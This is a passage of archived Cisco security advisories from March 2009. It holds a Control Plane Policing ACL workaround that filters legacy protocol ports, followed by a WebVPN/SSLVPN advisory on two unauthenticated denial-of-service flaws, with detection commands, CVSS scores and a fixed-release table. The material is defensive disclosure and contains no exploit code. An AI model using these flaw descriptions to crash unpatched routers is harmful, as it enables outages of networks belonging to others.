!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 350
access-list 150 permit tcp any any eq 10000
!---
!--- Feature: STUN
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 1994
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any range 1990 1992
!---
!--- Permit STUN traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 1994
access-list 150 permit tcp any any range 1990 1992
!---
!--- Feature: BSTUN
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 1963
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any range 1976 1979
!---
!--- Permit BSTUN traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 1963
access-list 150 permit tcp any any range 1976 1979
!---
!--- Feature: NCIA
!---
!--- Leverage the underlying protocols, DLSw, RSRB, etc.
!---
!---
!--- Feature: DLSW
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 2065
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 2067
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any range 1981 1983
!---
!--- Permit DLSW traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 2065
access-list 150 permit tcp any any eq 2067
access-list 150 permit tcp any any range 1981 1983
!---
!--- Feature: RSRB
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any range 1987 1989
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 1996
!---
!--- Permit RSRB traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any range 1987 1989
access-list 150 permit tcp any any eq 1996
!---
!--- Feature: PPTP
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 1723
!---
!--- Permit PPTP traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 1723
!---
!--- Feature: RBP
!---
!--- RBP will listen for TCP connections on the configured port
!--- as per "local port <port_number>". The following example
!--- uses port 1055
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 1055
!---
!--- Permit RBP traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 1055
!---
!--- Feature: XOT and X.25 Routing
!---
access-list 150 deny tcp TRUSTED_HOSTS WILDCARD
any eq 1998
!---
!--- Permit XOT and X25 traffic sent to all IP addresses
!--- configured on all interfaces of the affected device so
!--- that it will be policed and dropped by the CoPP feature
!---
access-list 150 permit tcp any any eq 1998
!---
!--- Permit (Police or Drop)/Deny (Allow) all other Layer3 and
!--- Layer4 traffic in accordance with existing security policies
!--- configurations for traffic that is authorized to be sent
!--- and to infrastructure devices
!--- Create a Class-Map for traffic to be policed by
!--- the CoPP feature
!---
class-map match-all drop-tcp-class
match access-group 150
!---
!--- Create a Policy-Map that will be applied to the
!--- Control-Plane of the device.
!---
policy-map drop-tcp-traffic
class drop-tcp-class
drop
!---
!--- Apply the Policy-Map to the
!--- Control-Plane of the device
!---
control-plane
service-policy input drop-tcp-traffic
In the above CoPP example, the access control list entries (ACEs)
that match the potential exploit packets with the "permit" action
result in these packets being discarded by the policy-map "drop"
function, while packets that match the "deny" action (not shown) are
not affected by the policy-map drop function. Please note that the
policy-map syntax is different in the 12.2S and 12.0S Cisco IOS
trains:
policy-map drop-tcp-traffic
class drop-tcp-class
police 32000 1500 1500 conform-action drop exceed-action drop
Additional information on the configuration and use of the CoPP
feature can be found in the documents, "Control Plane Policing
Implementation Best Practices" and "Cisco IOS Software Releases 12.2S
- - Control Plane Policing" at the following links
http://www.cisco.com/web/about/security/intelligence/coppwp_gs.html
and
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t4/feature/guide/gtrtlimt.html
Additional mitigations that can be deployed on Cisco devices within
the network are available in the "Cisco Applied Mitigation Bulletin"
companion document for this advisory, at the following link
http://www.cisco.com/warp/public/707/cisco-amb-20090325-tcp-and-ip.shtml
Obtaining Fixed Software
=======================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should
consult their maintenance provider or check the software for feature
set compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature sets
they have purchased. By installing, downloading, accessing or
otherwise using such software upgrades, customers agree to be bound
by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/docs/general/warranty/English/EU1KEN_.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml
Do not contact psirt@cisco.com or security-alert@cisco.com for
software upgrades.
Customers with Service Contracts
+-------------------------------
Customers with contracts should obtain upgraded software through
their regular update channels. For most customers, this means that
upgrades should be obtained through the Software Center on Cisco's
worldwide website at
http://www.cisco.com
Customers using Third Party Support Organizations
+------------------------------------------------
Customers whose Cisco products are provided or maintained through
prior or existing agreements with third-party support organizations,
such as Cisco Partners, authorized resellers, or service providers
should contact that support organization for guidance and assistance
with the appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or
fix is the most appropriate for use in the intended network before it
is deployed.
Customers without Service Contracts
+----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco
service contract, and customers who purchase through third-party
vendors but are unsuccessful in obtaining fixed software through
their point of sale should acquire upgrades by contacting the Cisco
Technical Assistance Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to
a free upgrade. Free upgrades for non-contract customers must be
requested through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerability described in this advisory.
This vulnerability was found by Cisco internal testing.
Status of this Notice: FINAL
===========================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY ANY
KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or Paraphrase of the text of this document that
omits the distribution URL in the following section is an
uncontrolled copy, and may lack important information or contain
factual errors.
Distribution
===========
This advisory is posted on Cisco's worldwide website at :
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
In addition to worldwide web posting, a text version of this notice
is clear-signed with the Cisco PSIRT PGP key and is posted to the
following e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on
mailing lists or newsgroups. Users concerned about this problem are
encouraged to check the above URL for any updates.
Revision History
===============
+---------------------------------------+
| Revision | | Initial |
| 1.0 | 2009-March-25 | public |
| | | release |
+---------------------------------------+
Cisco Security Procedures
========================
Complete information on reporting security vulnerabilities in Cisco
products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html
This includes instructions for press inquiries regarding Cisco
security notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (Darwin)
iEYEARECAAYFAknKUb8ACgkQ86n/Gc8U/uCp1gCfS6aMv74rf1bDoby1JcGRFsN3
hpYAn1Oqp7nQxPwBrtptF3WM42HgGdIk
=NVYK
-----END PGP SIGNATURE-----
From - Wed Mar 25 13:22:49 2009
X-Account-Key: account7
X-UIDL: 4909bb8c00006ca8
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
Return-Path: <bugtraq-return-39839-lists=securityspace.com@securityfocus.com>
X-Original-To: lists@securityspace.com
Delivered-To: lists@securityspace.com
Received: from outgoing3.securityfocus.com (outgoing.securityfocus.com [205.206.231.27])
by mx.securityspace.com (Postfix) with ESMTP id 557E9EC182
for <lists@securityspace.com>; Wed, 25 Mar 2009 13:16:20 -0400 (EDT)
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 5C6E82373EF; Wed, 25 Mar 2009 09:34:12 -0700 (MST)
Mailing-List: contact bugtraq-help@securityfocus.com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq@securityfocus.com>
List-Help: <mailto:bugtraq-help@securityfocus.com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe@securityfocus.com>
List-Subscribe: <mailto:bugtraq-subscribe@securityfocus.com>
Delivered-To: mailing list bugtraq@securityfocus.com
Delivered-To: moderator for bugtraq@securityfocus.com
Received: (qmail 664 invoked from network); 25 Mar 2009 16:09:26 -0000
X-TACSUNS: Virus Scanned
Sender: nobody@cisco.com
From: Cisco Systems Product Security Incident Response Team <psirt@cisco.com>
To: bugtraq@securityfocus.com
Cc: psirt@cisco.com
Subject: Cisco Security Advisory: Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
Date: Wed, 25 Mar 2009 17:00:00 +0100
Message-id: <200903251705.webvpn@psirt.cisco.com>
Reply-To: psirt@cisco.com
Errors-To: nobody@cisco.com
MIME-Version: 1.0
Content-Type: Text/Plain; charset="us-ascii"
Content-Transfer-Encoding: 8bit
Prevent-NonDelivery-Report:
Content-Return: Prohibited
Status:
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Cisco Security Advisory: Cisco IOS Software WebVPN and SSLVPN
Vulnerabilities
Advisory ID: cisco-sa-20090325-webvpn
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Revision 1.0
For Public Release 2009 March 25 1600 UTC (GMT)
- ---------------------------------------------------------------------
Summary
======
Cisco IOS software contains two vulnerabilities within the Cisco IOS
WebVPN or Cisco IOS SSLVPN feature (SSLVPN) that can be remotely
exploited without authentication to cause a denial of service
condition. Both vulnerabilities affect both Cisco IOS WebVPN and
Cisco IOS SSLVPN features:
1. Crafted HTTPS packet will crash device.
2. SSLVPN sessions cause a memory leak in the device.
Cisco has released free software updates that address these
vulnerabilities.
There are no workarounds that mitigate these vulnerabilities.
This advisory is posted at the following link:
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Note: The March 25, 2009, Cisco IOS Security Advisory bundled
publication includes eight Security Advisories. All of the advisories
address vulnerabilities in Cisco IOS Software. Each advisory lists
the releases that correct the vulnerability or vulnerabilities in the
advisory. The following table lists releases that correct all Cisco
IOS Software vulnerabilities that have been published in Cisco
Security Advisories on March 25, 2009, or earlier.
http://www.cisco.com/warp/public/707/cisco-sa-20090325-bundle.shtml
Individual publication links are listed below:
* Cisco IOS cTCP Denial of Service Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ctcp.shtml
* Cisco IOS Software Multiple Features IP Sockets Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-ip.shtml
* Cisco IOS Software Mobile IP and Mobile IPv6 Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-mobileip.shtml
* Cisco IOS Software Secure Copy Privilege Escalation Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-scp.shtml
* Cisco IOS Software Session Initiation Protocol Denial of Service
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-sip.shtml
* Cisco IOS Software Multiple Features Crafted TCP Sequence
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-tcp.shtml
* Cisco IOS Software Multiple Features Crafted UDP Packet
Vulnerability
http://www.cisco.com/warp/public/707/cisco-sa-20090325-udp.shtml
* Cisco IOS Software WebVPN and SSLVPN Vulnerabilities
http://www.cisco.com/warp/public/707/cisco-sa-20090325-webvpn.shtml
Affected Products
================
Vulnerable Products
+------------------
Devices running affected versions of Cisco IOS software are affected
if configured with SSLVPN.
To determine the Cisco IOS Software release that is running on a
Cisco product, administrators can log in to the device and issue the
"show version" command to display the system banner. The system
banner confirms that the device is running Cisco IOS Software by
displaying text similar to "Cisco Internetwork Operating System
Software" or "Cisco IOS Software." The image name displays in
parentheses, followed by "Version" and the Cisco IOS Software release
name. Other Cisco devices do not have the "show version" command or
may provide different output.
The following example identifies a Cisco product that is running
Cisco IOS Software Release 12.3(26) with an installed image name of
C2500-IS-L:
Router#show version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-IS-L), Version 12.3(26), RELEASE SOFTWARE (fc2)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by cisco Systems, Inc.
Compiled Mon 17-Mar-08 14:39 by dchih
<output truncated>
The following example shows a product that is running Cisco IOS
Software release 12.4(20)T with an image name of
C1841-ADVENTERPRISEK9-M:
Router#show version
Cisco IOS Software, 1841 Software (C1841-ADVENTERPRISEK9-M), Version 12.4(20)T, RELEASE SOFTWARE (fc3)
Technical Support:
http://www.cisco.com/techsupport
Copyright (c) 1986-2008 by Cisco Systems, Inc.
Compiled Thu 10-Jul-08 20:25 by prod_rel_team
<output truncated>
Additional information about Cisco IOS Software release naming
conventions is available in "White Paper: Cisco IOS Reference Guide"
at the following link:
http://www.cisco.com/warp/public/620/1.html
To determine that SSLVPN is enabled on your device, log in to the
device and issue the command-line interface (CLI) command "show
running-config | include webvpn". If the device returns any output
this means that SSLVPN is configured on the device and the device may
be vulnerable. Vulnerable configurations vary depending on whether
the device is supporting Cisco IOS WebVPN (introduced in Release 12.3
(14)T) or Cisco IOS SSLVPNs (introduced in Release 12.4(6)T). The
following methods describe how to confirm if the device is
vulnerable:
If the output from "show running-config | include webvpn" contains
"webvpn enable" then the device is configured with the original Cisco
IOS WebVPN. The only way to confirm the device is vulnerable is to
examine the output of "show running-config" to confirm that webvpn is
enabled via the command "webvpn enable" and that a "ssl trustpoint"
has been configured. The following example shows a vulnerable device
configured with Cisco IOS WebVPN:
webvpn enable
!
webvpn
ssl trustpoint TP-self-signed-29742012
If the output from "show running-config | include webvpn" contains
"webvpn gateway <word>" then the device is supporting the Cisco IOS
SSLVPN feature. A device is vulnerable if it has the "inservice"
command in at least one of the "webvpn gateway" sections. The
following example shows a vulnerable device configured with Cisco IOS
SSLVPN:
Router# show running | section webvpn
webvpn gateway Gateway
ip address 10.1.1.1 port 443
ssl trustpoint Gateway-TP
inservice
!
Router#
A device that supports the Cisco IOS SSLVPN is not vulnerable if it
has no "webvpn gateways" configured or all the configured "webvpn
gateways" contain the "no inservice" "webvpn gateway" command.
Products Confirmed Not Vulnerable
+--------------------------------
The following products are not affected by this vulnerability:
* Cisco ASA 5500 Series Adaptive Security Appliances
* Cisco IOS XR Software
* Cisco IOS XE Software
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
======
The Cisco SSLVPN feature provides remote access to enterprise sites
by users from anywhere on the Internet. The SSLVPN provides users
with secure access to specific enterprise applications, such as
e-mail and web browsing, without requiring them to have VPN client
software installed on their end-user devices.
The WebVPN Enhancements feature (Cisco IOS SSLVPN), released in Cisco
IOS Release 12.4(6)T, obsoletes the commands and configurations
originally put forward in Cisco IOS WebVPN.
Further information about Cisco IOS WebVPN is available in the "Cisco
IOS Software Release 12.3T WebVPN feature guide" at the following
link:
http://www.cisco.com/en/US/docs/ios/12_3t/12_3t14/feature/guide/g_sslvpn.html
Further information about Cisco IOS SSLVPN is available in the "Cisco
IOS Software Release 12.4T SSLVPN feature guide" at the following
link:
http://www.cisco.com/en/US/docs/ios/12_4t/12_4t11/htwebvpn.html
Details regarding these two vulnerabilities in Cisco IOS devices that
are running affected versions of system software are:
Crafted HTTPS packet will crash device
+--------------------------------------
A device configured for SSLVPN may reload or hang when it receives a
specially crafted HTTPS packet. Completion of the 3-way handshake to
the associated TCP port number of the SSLVPN feature is required in
order for the vulnerability to be successfully exploited, however
authentication is "not" required. The default TCP port number for
SSLVPN is 443.
This vulnerability is documented in Cisco bug ID CSCsk62253
and Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0626 has been assigned to this vulnerability.
SSLVPN sessions cause a memory leak in the device
+------------------------------------------------
A device configured for SSLVPN may leak transmission control blocks
(TCBs) when processing an abnormally disconnected SSL session.
Continued exploitation may result in the device depleting its memory
resources and result in a crash of the device. Authentication is
"not" required to exploit this vulnerability.
The memory leak can be detected by running the command "show tcp
brief", like in the following example:
Router#show tcp brief
TCB Local Address Foreign Address (state)
468BBDC0 192.168.0.22.443 192.168.0.33.19794 CLOSEWAIT
482D4730 192.168.0.22.443 192.168.0.33.22092 CLOSEWAIT
482779A4 192.168.0.22.443 192.168.0.33.16978 CLOSEWAIT
4693DEBC 192.168.0.22.443 192.168.0.33.21580 CLOSEWAIT
482D3418 192.168.0.22.443 192.168.0.33.17244 CLOSEWAIT
482B8ACC 192.168.0.22.443 192.168.0.33.16564 CLOSEWAIT
46954EB0 192.168.0.22.443 192.168.0.33.19532 CLOSEWAIT
468BA9B8 192.168.0.22.443 192.168.0.33.15781 CLOSEWAIT
482908C4 192.168.0.22.443 192.168.0.33.19275 CLOSEWAIT
4829D66C 192.168.0.22.443 192.168.0.33.19314 CLOSEWAIT
468A2D94 192.168.0.22.443 192.168.0.33.14736 CLOSEWAIT
4688F590 192.168.0.22.443 192.168.0.33.18786 CLOSEWAIT
4693CBA4 192.168.0.22.443 192.168.0.33.12176 CLOSEWAIT
4829ABC4 192.168.0.22.443 192.168.0.33.39629 CLOSEWAIT
4691206C 192.168.0.22.443 192.168.0.33.17818 CLOSEWAIT
46868224 192.168.0.22.443 192.168.0.33.16774 CLOSEWAIT
4832BFAC 192.168.0.22.443 192.168.0.33.39883 CLOSEWAIT
482D10CC 192.168.0.22.443 192.168.0.33.13677 CLOSEWAIT
4829B120 192.168.0.22.443 192.168.0.33.20870 CLOSEWAIT
482862FC 192.168.0.22.443 192.168.0.33.17035 CLOSEWAIT
482EC13C 192.168.0.22.443 192.168.0.33.16053 CLOSEWAIT
482901D8 192.168.0.22.443 192.168.0.33.16200 CLOSEWAIT
In the output above, those Transmission Control Blocks (TCBs) in the
state CLOSEWAIT will not go away and represent memory leaks. Please
note that only TCP connections with a local TCP port of 443 (the
well-known port for HTTPS) are relevant.
This vulnerability is documented in Cisco bug ID CSCsw24700
and Common Vulnerabilities and Exposures (CVE) identifier
CVE-2009-0628 has been assigned to this vulnerability.
Vulnerability Scoring Details
============================
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at
http://intellishield.cisco.com/security/alertmanager/cvss
CSCsk62253 - Crafted HTTPS packet will crash device.
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
CSCsw24700 - SSLVPN sessions cause a memory leak in the device.
CVSS Base Score - 7.8
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - None
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 6.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
=====
Successful exploitation of any of the two vulnerabilities may result
in the device crashing, not accepting any new SSLVPN sessions or a
memory leak. Repeated exploitation may result in an extended denial
of service (DoS) condition.
Software Versions and Fixes
==========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to
determine exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the Cisco IOS software table (below) names a Cisco IOS
release train. If a given release train is vulnerable, then the
earliest possible releases that contain the fix (along with the
anticipated date of availability for each, if applicable) are listed
in the "First Fixed Release" column of the table. The "Recommended
Release" column indicates the releases which have fixes for all the
published vulnerabilities at the time of this Advisory. A device
running a release in the given train that is earlier than the release
in a specific column (less than the First Fixed Release) is known to
be vulnerable. Cisco recommends upgrading to a release equal to or
later than the release in the "Recommended Releases" column of the
table.
+-------------------------------------------------------------------+
| Major | Availability of Repaired Releases |
| Release | |
|------------+------------------------------------------------------|
| Affected | | Recommended |
| 12.0-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.0 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.1-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.1 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.2-Based | First Fixed Release | Release |
| Releases | | |
|-------------------------------------------------------------------|
| There are no affected 12.2 based releases |
|-------------------------------------------------------------------|
| Affected | | Recommended |
| 12.3-Based | First Fixed Release | Release |
| Releases | | |
|------------+--------------------------------------+---------------|
| 12.3 | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3B | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3BC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3BW | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3EU | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JEA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JEB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JEC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3JX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3T | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.3TPC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3VA | Vulnerable; contact TAC | |
|------------+--------------------------------------+---------------|
| 12.3XA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XC | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XD | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XE | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XF | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XG | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XI | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XJ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XQ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XR | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XS | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XU | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XW | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XY | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3XZ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YD | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YF | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YG | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YH | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YI | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YJ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | Releases prior to 12.3(11)YK3 are | 12.4(22)T1 |
| | vulnerable, release 12.3(11)YK3 and | |
| 12.3YK | later are not vulnerable; first | 12.4(15)T9; |
| | fixed in 12.4T | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.3YM | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YQ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YS | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YT | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.3YU | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.3YX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3YZ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.3ZA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| Affected | | Recommended |
| 12.4-Based | First Fixed Release | Release |
| Releases | | |
|------------+--------------------------------------+---------------|
| | | 12.4(18e) |
| | 12.4(18e) | |
| 12.4 | | 12.4(23a); |
| | 12.4(23a); Available on 30-APR-2009 | Available on |
| | | 30-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4JA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JDA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JMA | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JMB | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4JX | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4MD | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4MR | 12.4(16)MR | 12.4(19)MR2 |
|------------+--------------------------------------+---------------|
| 12.4SW | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | 12.4(15)T7 | 12.4(22)T1 |
| | | |
| 12.4T | 12.4(20)T | 12.4(15)T9; |
| | | Available on |
| | 12.4(15)T9; Available on 29-APR-2009 | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XA | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XB | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XC | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| | 12.4(4)XD12; Available on | 12.4(4)XD12; |
| 12.4XD | 27-MAR-2009 | Available on |
| | | 27-MAR-2009 |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XE | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XF | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XG | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
| | | |
| 12.4XJ | Vulnerable; first fixed in 12.4T | 12.4(15)T9; |
| | | Available on |
| | | 29-APR-2009 |
|------------+--------------------------------------+---------------|
| 12.4XK | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XL | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XM | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XN | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XP | Vulnerable; contact TAC | |
|------------+--------------------------------------+---------------|
| 12.4XQ | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| 12.4XR | Not Vulnerable | |
|------------+--------------------------------------+---------------|
| | | 12.4(22)T1 |
